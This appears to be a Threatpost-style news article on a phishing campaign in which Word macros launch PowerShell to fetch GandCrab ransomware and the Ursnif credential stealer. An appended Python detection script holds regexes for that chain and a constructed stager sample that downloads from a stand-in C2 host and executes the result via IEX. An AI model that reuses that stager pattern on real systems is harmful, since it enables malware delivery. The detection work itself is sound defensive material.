Phishing Campaign Delivers Nasty Ransomware, Credential-Theft Two-Punch

A spate of phishing emails with Word attachments delivers both the GandCrab ransomware and the Ursnif executable.

An array of phishing emails harboring Word attachments with embedded macros has been infecting systems with a deadly malware and ransomware duo.

The campaign, spotted by researchers at Carbon Black, hits infected systems with a lethal attack combination that harvests credentials, gathers system and process information, and then encrypts data in order to extort payments from victims.

The attack originally came in via phishing emails that contained an attached Word document with embedded macros. The macro would then call an encoded PowerShell script and use a series of techniques to download and execute both an Ursnif malware strain and a GandCrab ransomware variant.

The campaign appears to have begun targeting victims on Dec. 17, Carbon Black researchers told Threatpost. There have been a couple of different pockets of activity observed each week since then, they said.

“The campaign appears to be ongoing, as we are seeing additional payloads being posted on that are almost identical to the payloads that were leveraged to data extracted from our analysis of these samples,” Jared Myers, senior threat researcher for Carbon Black, told Threatpost.

The Attack

The initial phishing emails included a Microsoft Word document to deliver the early stages of the attack.

“The overall attack leverages several different approaches, which are popular techniques amongst red-teamers, espionage-focused adversaries and large-scale criminal campaigns,” said Carbon Black researchers in a Thursday analysis.

Figure: GandCrab ransomware phishing

These documents contained a VBS macro that, once decompressed, totaled approximately 650 lines of code. Interestingly, the vast majority of that was junk code – once it was removed, only about 18 lines of relevant code remained.

From there, a PowerShell script was downloaded and executed. That script contacted a hard-coded command-and-control (C2) address and retrieved two payloads: one via the DownloadString method, which ultimately leads to the GandCrab ransomware, and one via the DownloadData method, which eventually delivers the Ursnif malware strain.

GandCrab ransomware has been spotted in several campaigns over the past year, including hidden on legitimate but compromised websites, and infecting victims via a December sextortion campaign.

“The first payload that is downloaded via the DownloadString method…is a PowerShell one-liner that uses an ‘if’ statement to evaluate the architecture of the compromised system, and then downloads an additional payload from  This additional payload is then executed in memory,” researchers said.

The Ursnif executable, meanwhile, is downloaded via the DownloadData method and then performs an array of malicious activities, such as credential harvesting, gathering system and process information, and deploying additional malware samples.
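As an added, defender-side illustration (not code from Carbon Black or Threatpost): a small Python triage routine that scores a PowerShell script-block log entry against the behaviours described above, flagging a block only when several of them co-occur. The indicator names, sample blocks and example.invalid hosts are constructed for the demonstration.

```python
import re

# Behaviours the article attributes to the chain: an encoded PowerShell
# launch, a hard-coded C2 fetched via DownloadString and DownloadData,
# an architecture check, and in-memory execution of the result.
INDICATORS = {
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_string": re.compile(r"\.DownloadString\s*\(", re.I),
    "download_data": re.compile(r"\.DownloadData\s*\(", re.I),
    "arch_check": re.compile(r"\[IntPtr\]::Size|Is64BitOperatingSystem|PROCESSOR_ARCHITECTURE", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}

# Hard-coded URLs are worth extracting for blocking and hunting.
URL_RX = re.compile(r"https?://[^\s'\"()]+", re.I)


def analyse_script_block(text):
    """Return the indicator names matched and the hard-coded URLs found."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    urls = sorted(set(URL_RX.findall(text)))
    return hits, urls


def is_suspicious(text, min_hits=3):
    """Flag a block when enough of the chain's indicators co-occur.
    Any single indicator is common in admin scripts; the combination is not."""
    hits, _ = analyse_script_block(text)
    return len(hits) >= min_hits


# Constructed sample script blocks (hypothetical, not from the campaign).
BENIGN = "Invoke-WebRequest -Uri 'https://intranet.example.invalid/health' | Select-Object StatusCode"
ENCODED_LAUNCH = "powershell.exe -NoP -W Hidden -Enc " + "A" * 40
STAGER_LIKE = (
    "$wc = New-Object Net.WebClient; "
    "if ([IntPtr]::Size -eq 8) { $u = 'http://c2.example.invalid/a64' } else { $u = 'http://c2.example.invalid/a32' }; "
    "IEX $wc.DownloadString($u); "
    "$d = $wc.DownloadData('http://c2.example.invalid/u.bin')"
)

if __name__ == "__main__":
    for label, block in (("benign", BENIGN), ("encoded-launch", ENCODED_LAUNCH), ("stager-like", STAGER_LIKE)):
        hits, urls = analyse_script_block(block)
        print(label, "SUSPICIOUS" if is_suspicious(block) else "ok", hits, urls)
```

The encoded launch alone stays below the threshold, which is deliberate: the encoded command is the macro's entry point, and the downloader behaviour that follows it is what distinguishes this chain from routine scripted administration.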

While no additional data is available on the number of victims in the campaign, Carbon Black researchers said that they have located roughly 180 Word document variants in the wild.

“We have not observed where any one particular malicious document was sent at a higher rate to potential victims than any other,” Myers told Threatpost. “However, the variants were presumably created in batches that were then sent to potential victims, so, depending on the effectiveness of the phishing emails, some may appear to be more successful than others.”
